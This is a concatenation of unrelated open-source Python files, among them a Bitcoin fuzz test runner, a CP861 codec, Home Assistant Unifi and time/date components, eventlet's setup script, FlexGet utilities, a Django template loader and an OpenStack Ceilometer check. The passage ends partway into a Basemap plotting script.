        if "libFuzzer" not in help_output:
            logging.error("Must be built with libFuzzer")
            sys.exit(1)
    except subprocess.TimeoutExpired:
        logging.error("subprocess timed out: Currently only libFuzzer is supported")
        sys.exit(1)
    with ThreadPoolExecutor(max_workers=args.par) as fuzz_pool:
        if args.generate:
            return generate_corpus_seeds(
                fuzz_pool=fuzz_pool,
                src_dir=config['environment']['SRCDIR'],
                build_dir=config["environment"]["BUILDDIR"],
                seed_dir=args.seed_dir,
                targets=test_list_selection,
            )
        if args.m_dir:
            merge_inputs(
                fuzz_pool=fuzz_pool,
                corpus=args.seed_dir,
                test_list=test_list_selection,
                src_dir=config['environment']['SRCDIR'],
                build_dir=config["environment"]["BUILDDIR"],
                merge_dir=args.m_dir,
            )
            return
        run_once(
            fuzz_pool=fuzz_pool,
            corpus=args.seed_dir,
            test_list=test_list_selection,
            src_dir=config['environment']['SRCDIR'],
            build_dir=config["environment"]["BUILDDIR"],
            use_valgrind=args.valgrind,
        )
def generate_corpus_seeds(*, fuzz_pool, src_dir, build_dir, seed_dir, targets):
    """Generates new corpus seeds.
    Run {targets} without input, and outputs the generated corpus seeds to
    {seed_dir}.
    """
    logging.info("Generating corpus seeds to {}".format(seed_dir))
    def job(command, t):
        # Run one fuzz binary; its stderr is libFuzzer's progress report.
        logging.debug("Running '{}'\n".format(" ".join(command)))
        logging.debug("Command '{}' output:\n'{}'\n".format(
            ' '.join(command),
            subprocess.run(
                command,
                env=get_fuzz_env(target=t, source_dir=src_dir),
                check=True,
                stderr=subprocess.PIPE,
                universal_newlines=True,
            ).stderr))
    futures = []
    for target in targets:
        target_seed_dir = os.path.join(seed_dir, target)
        os.makedirs(target_seed_dir, exist_ok=True)
        command = [
            os.path.join(build_dir, 'src', 'test', 'fuzz', 'fuzz'),
            "-runs=100000",
            target_seed_dir,
        ]
        futures.append(fuzz_pool.submit(job, command, target))
    # Propagate any subprocess.CalledProcessError from the workers.
    for future in as_completed(futures):
        future.result()
def merge_inputs(*, fuzz_pool, corpus, test_list, src_dir, build_dir, merge_dir):
    """Merge each target's inputs from merge_dir into its seed corpus.

    Uses libFuzzer's -merge=1 to copy only coverage-increasing inputs,
    preferring small ones; runs targets in parallel on fuzz_pool.
    """
    logging.info("Merge the inputs from the passed dir into the seed_dir. Passed dir {}".format(merge_dir))
    jobs = []
    for t in test_list:
        args = [
            os.path.join(build_dir, 'src', 'test', 'fuzz', 'fuzz'),
            '-merge=1',
            '-shuffle=0',
            '-prefer_small=1',
            '-use_value_profile=1',  # Also done by oss-fuzz https://github.com/google/oss-fuzz/issues/1406#issuecomment-387790487
            os.path.join(corpus, t),
            os.path.join(merge_dir, t),
        ]
        # Both directories must exist or libFuzzer aborts.
        os.makedirs(os.path.join(corpus, t), exist_ok=True)
        os.makedirs(os.path.join(merge_dir, t), exist_ok=True)
        def job(t, args):
            output = 'Run {} with args {}\n'.format(t, " ".join(args))
            output += subprocess.run(
                args,
                env=get_fuzz_env(target=t, source_dir=src_dir),
                check=True,
                stderr=subprocess.PIPE,
                universal_newlines=True,
            ).stderr
            logging.debug(output)
        jobs.append(fuzz_pool.submit(job, t, args))
    # Propagate any subprocess failure raised inside a worker.
    for future in as_completed(jobs):
        future.result()
def run_once(*, fuzz_pool, corpus, test_list, src_dir, build_dir, use_valgrind):
    """Run every selected target once over its seed corpus (in parallel).

    Exits the process with status 1 on the first target that fails.
    """
    jobs = []
    for t in test_list:
        corpus_path = os.path.join(corpus, t)
        os.makedirs(corpus_path, exist_ok=True)
        args = [
            os.path.join(build_dir, 'src', 'test', 'fuzz', 'fuzz'),
            '-runs=1',
            corpus_path,
        ]
        if use_valgrind:
            # Wrap the invocation so memory errors fail the run.
            args = ['valgrind', '--quiet', '--error-exitcode=1'] + args
        def job(t, args):
            output = 'Run {} with args {}'.format(t, args)
            # No check=True here: the return code is inspected by the caller
            # so the target's output can be logged before exiting.
            result = subprocess.run(
                args,
                env=get_fuzz_env(target=t, source_dir=src_dir),
                stderr=subprocess.PIPE,
                universal_newlines=True,
            )
            output += result.stderr
            return output, result
        jobs.append(fuzz_pool.submit(job, t, args))
    for future in as_completed(jobs):
        output, result = future.result()
        logging.debug(output)
        try:
            result.check_returncode()
        except subprocess.CalledProcessError as e:
            if e.stdout:
                logging.info(e.stdout)
            if e.stderr:
                logging.info(e.stderr)
            logging.info("Target \"{}\" failed with exit code {}".format(" ".join(result.args), e.returncode))
            sys.exit(1)
def parse_test_list(*, fuzz_bin):
    """Return the list of fuzz target names reported by the fuzz binary.

    The binary prints one target per line (then aborts) when
    PRINT_ALL_FUZZ_TARGETS_AND_ABORT is present in its environment.
    """
    test_list_all = subprocess.run(
        fuzz_bin,
        env={
            'PRINT_ALL_FUZZ_TARGETS_AND_ABORT': ''
        },
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        universal_newlines=True,
    ).stdout.splitlines()
    return test_list_all
# Script entry point.
if __name__ == '__main__':
    main()
| Sjors/bitcoin | test/fuzz/test_runner.py | Python | mit | 10,859 |
""" Python Character Mapping Codec generated from 'CP861.TXT' with gencodec.py.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    # Stateless charmap codec backed by the module-level translation tables.
    def encode(self,input,errors='strict'):
        # Unicode -> CP861 bytes via the reverse table built below.
        return codecs.charmap_encode(input,errors,encoding_map)
    def decode(self,input,errors='strict'):
        # CP861 bytes -> Unicode via the decoding table.
        return codecs.charmap_decode(input,errors,decoding_map)
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream wrapper; all conversion work happens in Codec.encode.
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Stream wrapper; all conversion work happens in Codec.decode.
    pass
### encodings module API
def getregentry():
    # Codec registry hook: (encoder, decoder, stream reader, stream writer).
    return (Codec().encode,Codec().decode,StreamReader,StreamWriter)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00e5, # LATIN SMALL LETTER A WITH RING ABOVE
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00eb, # LATIN SMALL LETTER E WITH DIAERESIS
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00d0, # LATIN CAPITAL LETTER ETH
0x008c: 0x00f0, # LATIN SMALL LETTER ETH
0x008d: 0x00de, # LATIN CAPITAL LETTER THORN
0x008e: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x008f: 0x00c5, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00e6, # LATIN SMALL LIGATURE AE
0x0092: 0x00c6, # LATIN CAPITAL LIGATURE AE
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x0095: 0x00fe, # LATIN SMALL LETTER THORN
0x0096: 0x00fb, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x0097: 0x00dd, # LATIN CAPITAL LETTER Y WITH ACUTE
0x0098: 0x00fd, # LATIN SMALL LETTER Y WITH ACUTE
0x0099: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00f8, # LATIN SMALL LETTER O WITH STROKE
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d8, # LATIN CAPITAL LETTER O WITH STROKE
0x009e: 0x20a7, # PESETA SIGN
0x009f: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x00a0: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x00a1: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00c1, # LATIN CAPITAL LETTER A WITH ACUTE
0x00a5: 0x00cd, # LATIN CAPITAL LETTER I WITH ACUTE
0x00a6: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00a7: 0x00da, # LATIN CAPITAL LETTER U WITH ACUTE
0x00a8: 0x00bf, # INVERTED QUESTION MARK
0x00a9: 0x2310, # REVERSED NOT SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00a1, # INVERTED EXCLAMATION MARK
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03b1, # GREEK SMALL LETTER ALPHA
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x00e3: 0x03c0, # GREEK SMALL LETTER PI
0x00e4: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x00e5: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x03c4, # GREEK SMALL LETTER TAU
0x00e8: 0x03a6, # GREEK CAPITAL LETTER PHI
0x00e9: 0x0398, # GREEK CAPITAL LETTER THETA
0x00ea: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x00eb: 0x03b4, # GREEK SMALL LETTER DELTA
0x00ec: 0x221e, # INFINITY
0x00ed: 0x03c6, # GREEK SMALL LETTER PHI
0x00ee: 0x03b5, # GREEK SMALL LETTER EPSILON
0x00ef: 0x2229, # INTERSECTION
0x00f0: 0x2261, # IDENTICAL TO
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x2320, # TOP HALF INTEGRAL
0x00f5: 0x2321, # BOTTOM HALF INTEGRAL
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Encoding Map
# Invert the decoding table to get the unicode -> byte encoding table.
# (Left as an explicit loop: this file targets very old Python versions.)
encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k
| MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-2.1/Lib/encodings/cp861.py | Python | mit | 7,192 |
"""
Support for Unifi WAP controllers.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/device_tracker.unifi/
"""
import logging
import urllib
from homeassistant.components.device_tracker import DOMAIN
from homeassistant.const import CONF_HOST, CONF_USERNAME, CONF_PASSWORD
from homeassistant.helpers import validate_config
# Unifi package doesn't list urllib3 as a requirement
REQUIREMENTS = ['urllib3', 'unifi==1.2.5']
_LOGGER = logging.getLogger(__name__)
CONF_PORT = 'port'
CONF_SITE_ID = 'site_id'
def get_scanner(hass, config):
    """Setup Unifi device_tracker.

    Returns a UnifiScanner on success, or False when configuration is
    invalid or the controller cannot be reached.
    """
    # Imported lazily so the dependency is only needed when configured.
    from unifi.controller import Controller
    if not validate_config(config, {DOMAIN: [CONF_USERNAME,
                                             CONF_PASSWORD]},
                           _LOGGER):
        _LOGGER.error('Invalid configuration')
        return False
    this_config = config[DOMAIN]
    host = this_config.get(CONF_HOST, 'localhost')
    username = this_config.get(CONF_USERNAME)
    password = this_config.get(CONF_PASSWORD)
    site_id = this_config.get(CONF_SITE_ID, 'default')
    try:
        port = int(this_config.get(CONF_PORT, 8443))
    except ValueError:
        _LOGGER.error('Invalid port (must be numeric like 8443)')
        return False
    try:
        # 'v4' selects the controller API version.
        ctrl = Controller(host, username, password, port, 'v4', site_id)
    except urllib.error.HTTPError as ex:
        _LOGGER.error('Failed to connect to unifi: %s', ex)
        return False
    return UnifiScanner(ctrl)
class UnifiScanner(object):
    """Provide device_tracker support from Unifi WAP client data.

    Devices are identified by MAC address, as reported by the controller.
    """
    def __init__(self, controller):
        """Initialize the scanner."""
        self._controller = controller
        self._update()
    def _update(self):
        """Get the clients from the device."""
        try:
            clients = self._controller.get_clients()
        except urllib.error.HTTPError as ex:
            # Best-effort: log and report no clients this cycle.
            _LOGGER.error('Failed to scan clients: %s', ex)
            clients = []
        # Index the client records by MAC for fast lookup.
        self._clients = {client['mac']: client for client in clients}
    def scan_devices(self):
        """Scan for devices."""
        self._update()
        # Returns the MAC addresses of currently known clients.
        return self._clients.keys()
    def get_device_name(self, mac):
        """Return the name (if known) of the device.
        If a name has been set in Unifi, then return that, else
        return the hostname if it has been detected.
        """
        client = self._clients.get(mac, {})
        # May be None when neither a name nor a hostname is known.
        name = client.get('name') or client.get('hostname')
        _LOGGER.debug('Device %s name %s', mac, name)
        return name
| deisi/home-assistant | homeassistant/components/device_tracker/unifi.py | Python | mit | 2,645 |
#!/usr/bin/env python
from setuptools import find_packages, setup
from eventlet import __version__
from os import path
# Read the long description up front with a context manager so the file
# handle is closed promptly (the original inline open() was never closed).
with open(path.join(path.dirname(__file__), 'README.rst')) as readme_file:
    long_description = readme_file.read()

setup(
    name='eventlet',
    version=__version__,
    description='Highly concurrent networking library',
    author='Linden Lab',
    author_email='eventletdev@lists.secondlife.com',
    url='http://eventlet.net',
    packages=find_packages(exclude=['benchmarks', 'tests', 'tests.*']),
    install_requires=(
        'greenlet >= 0.3',
    ),
    zip_safe=False,
    long_description=long_description,
    test_suite='nose.collector',
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python",
        "Operating System :: MacOS :: MacOS X",
        "Operating System :: POSIX",
        "Operating System :: Microsoft :: Windows",
        "Programming Language :: Python :: 2.6",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3.3",
        "Programming Language :: Python :: 3.4",
        "Topic :: Internet",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Intended Audience :: Developers",
        "Development Status :: 4 - Beta",
    ]
)
| collinstocks/eventlet | setup.py | Python | mit | 1,289 |
# Hack, hide DataLossWarnings
# Based on html5lib code namespaceHTMLElements=False should do it, but nope ...
# Also it doesn't seem to be available in older version from html5lib, removing it
import warnings
from typing import IO, Union
from bs4 import BeautifulSoup
from html5lib.constants import DataLossWarning
warnings.simplefilter('ignore', DataLossWarning)
def get_soup(obj: Union[str, IO, bytes], parser: str = 'html5lib') -> BeautifulSoup:
    """Parse *obj* (markup string, bytes, or file-like) into a BeautifulSoup tree."""
    return BeautifulSoup(obj, parser)
| Flexget/Flexget | flexget/utils/soup.py | Python | mit | 491 |
from __future__ import unicode_literals, division, absolute_import
import re
from argparse import ArgumentParser, ArgumentTypeError
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from flexget import options
from flexget.event import event
from flexget.terminal import TerminalTable, TerminalTableError, table_parser, console
from flexget.utils.database import Session
from . import db
def do_cli(manager, options):
    """Handle regexp-list cli"""
    # Dispatch table: subcommand name -> handler function.
    handlers = {
        'all': action_all,
        'list': action_list,
        'add': action_add,
        'del': action_del,
        'purge': action_purge,
    }
    handler = handlers[options.regexp_action]
    handler(options)
def action_all(options):
    """Show all regexp lists in a terminal table."""
    lists = db.get_regexp_lists()
    header = ['#', 'List Name']
    table_data = [header]
    for regexp_list in lists:
        table_data.append([regexp_list.id, regexp_list.name])
    table = TerminalTable(options.table_type, table_data)
    try:
        console(table.output)
    except TerminalTableError as e:
        # Rendering can fail for unsupported table types/terminal widths.
        console('ERROR: %s' % str(e))
def action_list(options):
    """List the regexps stored in the named list, newest first."""
    with Session() as session:
        regexp_list = db.get_list_by_exact_name(options.list_name)
        if not regexp_list:
            console('Could not find regexp list with name {}'.format(options.list_name))
            return
        header = ['Regexp']
        table_data = [header]
        regexps = db.get_regexps_by_list_id(
            regexp_list.id, order_by='added', descending=True, session=session
        )
        for regexp in regexps:
            # Guard against NULL regexp values in the database.
            regexp_row = [regexp.regexp or '']
            table_data.append(regexp_row)
        try:
            table = TerminalTable(options.table_type, table_data)
            console(table.output)
        except TerminalTableError as e:
            console('ERROR: %s' % str(e))
def action_add(options):
    """Add a regexp to the named list, creating the list if needed."""
    with Session() as session:
        regexp_list = db.get_list_by_exact_name(options.list_name)
        if not regexp_list:
            # Missing list is not an error for 'add': create it on the fly.
            console('Could not find regexp list with name {}, creating'.format(options.list_name))
            regexp_list = db.create_list(options.list_name, session=session)
        regexp = db.get_regexp(list_id=regexp_list.id, regexp=options.regexp, session=session)
        if not regexp:
            console("Adding regexp {} to list {}".format(options.regexp, regexp_list.name))
            db.add_to_list_by_name(regexp_list.name, options.regexp, session=session)
            console(
                'Successfully added regexp {} to regexp list {} '.format(
                    options.regexp, regexp_list.name
                )
            )
        else:
            # Duplicate adds are a no-op.
            console("Regexp {} already exists in list {}".format(options.regexp, regexp_list.name))
def action_del(options):
    """Remove a single regexp from the named list."""
    with Session() as session:
        regexp_list = db.get_list_by_exact_name(options.list_name)
        if not regexp_list:
            console('Could not find regexp list with name {}'.format(options.list_name))
            return
        regexp = db.get_regexp(list_id=regexp_list.id, regexp=options.regexp, session=session)
        if regexp:
            console('Removing regexp {} from list {}'.format(options.regexp, options.list_name))
            session.delete(regexp)
        else:
            # BUG FIX: previously referenced options.movie_title (copy/paste
            # from the movie-list CLI); the regexp-list argument namespace
            # only defines 'regexp', so this branch raised AttributeError.
            console(
                'Could not find regexp {} in list {}'.format(
                    options.regexp, options.list_name
                )
            )
            return
def action_purge(options):
    """Delete the entire named list and all its regexps."""
    with Session() as session:
        regexp_list = db.get_list_by_exact_name(options.list_name)
        if not regexp_list:
            console('Could not find regexp list with name {}'.format(options.list_name))
            return
        console('Deleting list %s' % options.list_name)
        session.delete(regexp_list)
def regexp_type(regexp):
    """argparse type validator: accept only strings that compile as regexps.

    Returns the string unchanged; raises ArgumentTypeError (carrying the
    re.error message) for invalid patterns.
    """
    try:
        re.compile(regexp)
    except re.error as err:
        raise ArgumentTypeError(err)
    return regexp
@event('options.register')
def register_parser_arguments():
    """Register the 'regexp-list' CLI command and its subcommands."""
    # Common option to be used in multiple subparsers
    regexp_parser = ArgumentParser(add_help=False)
    regexp_parser.add_argument('regexp', type=regexp_type, help="The regexp")
    list_name_parser = ArgumentParser(add_help=False)
    list_name_parser.add_argument(
        'list_name', nargs='?', help='Name of regexp list to operate on', default='regexps'
    )
    # Register subcommand
    parser = options.register_command('regexp-list', do_cli, help='View and manage regexp lists')
    # Set up our subparsers
    subparsers = parser.add_subparsers(title='actions', metavar='<action>', dest='regexp_action')
    subparsers.add_parser('all', parents=[table_parser], help='Shows all existing regexp lists')
    subparsers.add_parser(
        'list', parents=[list_name_parser, table_parser], help='List regexp from a list'
    )
    subparsers.add_parser(
        'add', parents=[list_name_parser, regexp_parser], help='Add a regexp to a list'
    )
    subparsers.add_parser(
        'del', parents=[list_name_parser, regexp_parser], help='Remove a regexp from a list'
    )
    subparsers.add_parser(
        'purge', parents=[list_name_parser], help='Removes an entire list. Use with caution!'
    )
| gazpachoking/Flexget | flexget/components/managed_lists/lists/regexp_list/cli.py | Python | mit | 5,302 |
# -*- coding: utf-8 -*-
# adaped from https://www.djangosnippets.org/snippets/1376/
from os.path import abspath, dirname, isdir, join
from django.apps import apps
from django.core.exceptions import ImproperlyConfigured
from django.template import TemplateDoesNotExist
from django.template.loaders.filesystem import Loader
class NameSpacedLoader(Loader):
    """Filesystem template loader for names of the form "app_label:path".

    Resolves the template only inside the named app's own templates/
    directory, allowing app-namespaced template lookups.
    """
    def _get_template_vars(self, template_name):
        """Split "app:name" and resolve the app's templates directory."""
        app_name, template_name = template_name.split(":", 1)
        try:
            template_dir = abspath(join(apps.get_app_config(app_name).path, 'templates'))
        except ImproperlyConfigured:
            # Unknown app label: report the template as missing.
            raise TemplateDoesNotExist()
        return template_name, template_dir
    def load_template_from_app(self, template_name, template_dirs=None):
        """
        Template loader that only serves templates from specific app's template directory.
        Works for template_names in format app_label:some/template/name.html
        """
        if ":" not in template_name:
            # Not namespaced; let other loaders handle it.
            raise TemplateDoesNotExist()
        template_name, template_dir = self._get_template_vars(template_name)
        if not isdir(template_dir):
            raise TemplateDoesNotExist()
        # Delegate to the filesystem loader, restricted to this one dir.
        return super().load_template_source(template_name, template_dirs=[template_dir])
    def load_template_source(self, template_name, template_dirs=None):
        """Loader entry point; always routes through the app-namespaced path."""
        return self.load_template_from_app(template_name)
| rambo/asylum | project/asylum/apptemplateloader.py | Python | mit | 1,416 |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Openstack Monitoring script for Sensu / Nagios
#
# Copyright © 2013-2014 eNovance <licensing@enovance.com>
#
# Author: Mehdi Abaakouk <mehdi.abaakouk@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oschecks import utils
def _check_ceilometer_api():
    """Probe the Ceilometer API by listing meters and report Nagios status.

    Exits via utils.critical/warning/ok depending on reachability and on
    how the elapsed time compares to the -w/-c thresholds.
    """
    ceilometer = utils.Ceilometer()
    ceilometer.add_argument('-w', dest='warning', type=int, default=5,
                            help='Warning timeout for Ceilometer APIs calls')
    ceilometer.add_argument('-c', dest='critical', type=int, default=10,
                            help='Critical timeout for Ceilometer APIs calls')
    options, client = ceilometer.setup()

    elapsed, meters = utils.timeit(client.meters.list)
    if not meters:
        utils.critical("Unable to contact Ceilometer API.")

    # Same message for both threshold breaches; only the level differs.
    slow_msg = ("Get meters took more than %d seconds, "
                "it's too long.|response_time=%d")
    if elapsed > options.critical:
        utils.critical(slow_msg % (options.critical, elapsed))
    elif elapsed > options.warning:
        utils.warning(slow_msg % (options.warning, elapsed))
    else:
        utils.ok("Get meters, Ceilometer API is working: "
                 "list %d meters in %d seconds.|response_time=%d" %
                 (len(meters), elapsed, elapsed))
def check_ceilometer_api():
    """Console entry point: run the API check under safe_run's error handling."""
    utils.safe_run(_check_ceilometer_api)
| juliovp01/ops_tools | roles/monitoring/files/ceilometer.py | Python | mit | 2,011 |
"""
Support for showing the date and the time.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.time_date/
"""
import logging
import homeassistant.util.dt as dt_util
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
OPTION_TYPES = {
'time': 'Time',
'date': 'Date',
'date_time': 'Date & Time',
'time_date': 'Time & Date',
'beat': 'Time (beat)',
'time_utc': 'Time (UTC)',
}
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Setup the Time and Date sensor."""
    if hass.config.time_zone is None:
        _LOGGER.error("Timezone is not set in Home Assistant config")
        return False

    sensors = []
    for option in config['display_options']:
        if option not in OPTION_TYPES:
            _LOGGER.error('Option type: "%s" does not exist', option)
        else:
            sensors.append(TimeDateSensor(option))

    add_devices(sensors)
# pylint: disable=too-few-public-methods
class TimeDateSensor(Entity):
    """Implementation of a Time and Date sensor."""

    def __init__(self, option_type):
        """Initialize the sensor for one of the OPTION_TYPES keys."""
        self._name = OPTION_TYPES[option_type]
        self.type = option_type
        self._state = None
        self.update()

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._name

    @property
    def state(self):
        """Return the state of the sensor."""
        return self._state

    @property
    def icon(self):
        """Icon to use in the frontend, if any."""
        if "date" in self.type and "time" in self.type:
            return "mdi:calendar-clock"
        elif "date" in self.type:
            return "mdi:calendar"
        else:
            return "mdi:clock"

    def update(self):
        """Get the latest data and updates the states."""
        time_date = dt_util.utcnow()
        time = dt_util.datetime_to_time_str(dt_util.as_local(time_date))
        time_utc = dt_util.datetime_to_time_str(time_date)
        date = dt_util.datetime_to_date_str(dt_util.as_local(time_date))

        # Calculate the beat (Swatch Internet Time) without date: seconds
        # since midnight in Biel Mean Time (UTC+1), divided into 1000 beats
        # of 86.4 s each.  The modulo wraps the +1 hour offset at midnight;
        # previously times after 23:00 UTC produced invalid beats > 1000.
        hours, minutes, seconds = time_date.strftime('%H:%M:%S').split(':')
        bmt_seconds = (int(seconds) + (int(minutes) * 60) +
                       ((int(hours) + 1) * 3600)) % 86400
        beat = bmt_seconds / 86.4

        if self.type == 'time':
            self._state = time
        elif self.type == 'date':
            self._state = date
        elif self.type == 'date_time':
            self._state = date + ', ' + time
        elif self.type == 'time_date':
            self._state = time + ', ' + date
        elif self.type == 'time_utc':
            self._state = time_utc
        elif self.type == 'beat':
            self._state = '{0:.2f}'.format(beat)
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
# read in data.
# read in data: each line of fcover.dat holds u, v, p at one grid point.
ul = []; vl = []; pl = []
nlons = 73; nlats = 73
dellat = 2.5; dellon = 5.
